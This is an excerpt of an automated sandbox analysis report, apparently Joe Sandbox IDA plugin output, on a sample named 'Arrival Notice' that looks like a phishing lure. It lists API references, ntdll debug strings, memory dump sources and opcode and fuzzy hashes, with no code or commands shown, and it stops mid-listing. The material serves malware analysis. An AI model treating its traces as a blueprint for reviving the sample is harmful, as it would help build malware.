                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 015E031E
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015E02E7
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015E02BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              • Opcode ID: 4d4c0fac548d23e577b58a5081d407a5794730a5ff10c8b1d7426a6383142948
                                                                              • Instruction ID: 1c5f6947e480d25751c479d787b4b773511a9b7a4ba0f231a752606b9d9e3240
                                                                              • Opcode Fuzzy Hash: 4d4c0fac548d23e577b58a5081d407a5794730a5ff10c8b1d7426a6383142948
                                                                              • Instruction Fuzzy Hash: 3AE19F706047429FDB29CF28C884B6ABBE1BB88314F140A5EF5A5CF2E1D7B4D945CB52
                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 015E7BAC
                                                                              • RTL: Resource at %p, xrefs: 015E7B8E
                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 015E7B7F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 0-871070163
                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E728C
                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 015E72C1
                                                                              • RTL: Resource at %p, xrefs: 015E72A3
                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015E7294
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 885266447-605551621
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$]:%u
                                                                              • API String ID: 48624451-3050659472
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280

                                                                              Execution Graph

                                                                              Execution Coverage:8.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:89
                                                                              Total number of Limit Nodes:2

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00F1AFFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 00F159C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 00F159C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F1D656,?,?,?,?,?), ref: 00F1D717
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F1D656,?,?,?,?,?), ref: 00F1D717
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F1B079,00000800,00000000,00000000), ref: 00F1B28A
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F1B079,00000800,00000000,00000000), ref: 00F1B28A
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00F1AFFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 9a30774b074657493cb5bfc0ca685cecabf22dddf84189cc4646b2b05617a1ce
                                                                              • Instruction ID: 6d45a4e40db69e3b0cc2acb364957a5bbc7e158df40f818ea1e6e1e4f741a242
                                                                              • Opcode Fuzzy Hash: 9a30774b074657493cb5bfc0ca685cecabf22dddf84189cc4646b2b05617a1ce
                                                                              • Instruction Fuzzy Hash: C511E0B5C00649CFCB10CF9AC444ADEFBF4EB88324F14846AD869A7210D379A585CFA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 682ad310514b634cde096bfb9a0b3a424c03d6b60a21c876cb1c8cb17dd1cb6d
                                                                              • Instruction ID: 39c834c1f4f71a43ab880112a72b2dc3733a8abc4815369fad3e641b86cebe8b
                                                                              • Opcode Fuzzy Hash: 682ad310514b634cde096bfb9a0b3a424c03d6b60a21c876cb1c8cb17dd1cb6d
                                                                              • Instruction Fuzzy Hash: 13213671108240DFCB059F14DDC0B97BFA5FB98318F248269E9096B25AD336D816CB61
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b82a9b6b87dc0866fd3a1970e6fc263eb814c408705ad5cfa6066e308b20e0d
                                                                              • Instruction ID: fcddf703a9349d04e4230fb0e781c9dfa23f8c1102cd94d1ed939f3c377485e8
                                                                              • Opcode Fuzzy Hash: 2b82a9b6b87dc0866fd3a1970e6fc263eb814c408705ad5cfa6066e308b20e0d
                                                                              • Instruction Fuzzy Hash: 38214271508200DFCB21DF14DDC0BABBF65FB98328F20C169E8092B256D336D856CAA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: df4943974d7d780822569b51463e4f9e54c7a5eff1bc3167219abb438dd1f2b8
                                                                              • Instruction ID: ca1da9ea2b3744866d0e49625da0b222f635497857c470b8d0544ef1d3569918
                                                                              • Opcode Fuzzy Hash: df4943974d7d780822569b51463e4f9e54c7a5eff1bc3167219abb438dd1f2b8
                                                                              • Instruction Fuzzy Hash: 39216A71108204DFCB05DF04CDC0B97BF65FB94324F20C569D9095B256D336E856C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1865807171.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ecd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd7c3e0a6624bc2ba89386852103b2718c36f64f27164584422dfd329a74fdb3
                                                                              • Instruction ID: 7446f4f53d7b0fe3d51f6691657911bc563cb54e737fb7d1940442c01771d386
                                                                              • Opcode Fuzzy Hash: bd7c3e0a6624bc2ba89386852103b2718c36f64f27164584422dfd329a74fdb3
                                                                              • Instruction Fuzzy Hash: 6421D071608200DFCB14DF18DA85F26BBA6EB84318F20C57DD84A5B296C33BD847CA61
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1865807171.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ecd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b8aedd7cbeab677774652dee1086b2ed8164674e36b38308e414e1189880379d
                                                                              • Instruction ID: a186f1e2dcfa1b23b04973e168f98cbe4d715498ec9d81f49ecbe47b42b09b0c
                                                                              • Opcode Fuzzy Hash: b8aedd7cbeab677774652dee1086b2ed8164674e36b38308e414e1189880379d
                                                                              • Instruction Fuzzy Hash: FA2141755093809FD712CF24D994B15BF71EB46214F28C5EAD8498B6A7C33B980BCB62
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                              • Instruction ID: 2ae1853d61cc03443e2f63cfd15f7389000671b0f882c74ac9679a9215f7bece
                                                                              • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                              • Instruction Fuzzy Hash: 9721A276504280DFCB06CF10D9C4B56BF72FB98318F24C6A9DD491B656D33AD416CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction ID: d1cab32ab8f8e7032dbd9c04389481dffaf37a594e5c08132881fe56ae0aa2c7
                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction Fuzzy Hash: 16112672404280CFCB12CF10D9C4B56BF71FB94328F24C6A9DC090B256C33AD85ACBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction ID: ba28517d009e19efe05632fac893084c1615bc2d615442c0594bc7bbc842a2dc
                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction Fuzzy Hash: AF112672404240CFCB12CF00D9C4B56BF71FB94328F24C6A9DD090B256C33AE85ACBA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aeb02549dc407b5aaf497e7b6f519f3f226f5a424c1b99549b5d762b691bcd18
                                                                              • Instruction ID: 123bbe6a4a23e26e3663d6a68dc09868cb63b32871d232ddac70874f1de7775d
                                                                              • Opcode Fuzzy Hash: aeb02549dc407b5aaf497e7b6f519f3f226f5a424c1b99549b5d762b691bcd18
                                                                              • Instruction Fuzzy Hash: FA01267100D3449AE7148E2ACDC4BE7BF9CEF40329F18C56AED096B282E679D840C6B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1859551028.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_ebd000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6bbe7893f908696ce584de2505d26667593145ff430f99c569ca65fb086ea535
                                                                              • Instruction ID: 5e8449958262b260bfe2be830020b59ebf1092b7226aae798dd852781efdf704
                                                                              • Opcode Fuzzy Hash: 6bbe7893f908696ce584de2505d26667593145ff430f99c569ca65fb086ea535
                                                                              • Instruction Fuzzy Hash: FEF0C272409344AEEB148E16CDC4BA3FFA8EB50739F18C45AED085F282D2799844CAB0

                                                                              Execution Graph

                                                                              Execution Coverage:0%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:1
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 61786 1532c1d LdrInitializeThunk

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 1532c0a-1532c0f 1 1532c11-1532c18 0->1 2 1532c1f-1532c26 LdrInitializeThunk 0->2
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0154FD4F,000000FF,00000024,015E6634,00000004,00000000,?,-00000018,7D810F61,?,?,01508B12,?,?,?,?), ref: 01532C24
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4f53288fd163a2ebb683ce401d91993a9f1757272b870896c027f7afa48c8d24
                                                                              • Instruction ID: 950850ffdf38b190c5dfd0f4be7f84e7c196f48cdbb7c6a26ccfb9177d7bf208
                                                                              • Opcode Fuzzy Hash: 4f53288fd163a2ebb683ce401d91993a9f1757272b870896c027f7afa48c8d24
                                                                              • Instruction Fuzzy Hash: 29B09B719019C5D6DA11F7A5460871B7A5077D0715F19C461D2030B41F4778D1D1E275

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5 1532df0-1532dfc LdrInitializeThunk
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0156E73E,0000005A,015CD040,00000020,00000000,015CD040,00000080,01554A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0153AE00), ref: 01532DFA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 1253f9e095866d1bea63dba8114fd486d4c0e4531fc849e8178375d585a40ba1
                                                                              • Instruction ID: 78ac999c06f632d88473396045dbbff633e11e930c292c5eddadabd236447928
                                                                              • Opcode Fuzzy Hash: 1253f9e095866d1bea63dba8114fd486d4c0e4531fc849e8178375d585a40ba1
                                                                              • Instruction Fuzzy Hash: B490023120140413D111719945047070059A7D0255F99C812A0424958DD6E68A52A221

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4 1532c1d-1532c26 LdrInitializeThunk
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0154FD4F,000000FF,00000024,015E6634,00000004,00000000,?,-00000018,7D810F61,?,?,01508B12,?,?,?,?), ref: 01532C24
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 910faab85d9f27654beee6ff6be3154363d67fb071c64fdc4306c9454abfca09
                                                                              • Instruction ID: 9daad728468a2959e633c893a330c1646fa8145985dcc296d1534e25c79691bd
                                                                              • Opcode Fuzzy Hash: 910faab85d9f27654beee6ff6be3154363d67fb071c64fdc4306c9454abfca09
                                                                              • Instruction Fuzzy Hash: A4A00231411605478291BA56488946AB164BAD022534DC346D1064841A57B41491B6A6

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 6 15335c0-15335cc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9f7dc2856ee371ea7ef120bcd6bfb1baaa6b1c651388297793aa20b5b3774330
                                                                              • Instruction ID: e8eff1221dcd7d2881a9ded410edc22ad766255445d6eef6db93c42cd6e87432
                                                                              • Opcode Fuzzy Hash: 9f7dc2856ee371ea7ef120bcd6bfb1baaa6b1c651388297793aa20b5b3774330
                                                                              • Instruction Fuzzy Hash: 1690023160550403D100719945147061055A7D0215F69C811A0424968DC7E58A5166A2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 7 42c001-42c037 10 42c03d-42c04b 7->10
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2048640803.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_42c000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1b8c77407e3df770313feec9b6e3edf85d36f4b9211376d07cb757514e6c501c
                                                                              • Instruction ID: 7ccc222256717fbe9da66e19fb99f99b4cedf2c9040dc8624fa9e7752e448d56
                                                                              • Opcode Fuzzy Hash: 1b8c77407e3df770313feec9b6e3edf85d36f4b9211376d07cb757514e6c501c
                                                                              • Instruction Fuzzy Hash: 60E02B71F84700ABD210E625EC82FEA73A8EB85304F50095EF29886080CB743A80C3D6

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID:
                                                                              • API String ID: 48624451-0
                                                                              • Opcode ID: f9c957a17619cfcc0d874a3c5ef072f78882806db7c6d57fb8afdcdcbde1749f
                                                                              • Instruction ID: 5fdbe60b8d417ca86b0fccf43c60983931be86f4663a9bf4e3a2edd525087bfd
                                                                              • Opcode Fuzzy Hash: f9c957a17619cfcc0d874a3c5ef072f78882806db7c6d57fb8afdcdcbde1749f
                                                                              • Instruction Fuzzy Hash: 2A51E5B6A00616AFCB11DF9C889097EFBF8BB98240B508569F569DB641D334DE418BE0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              Strings
                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 015579D0, 015579F5
                                                                              • SsHd, xrefs: 0150A3E4
                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 015579FA
                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 015579D5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp
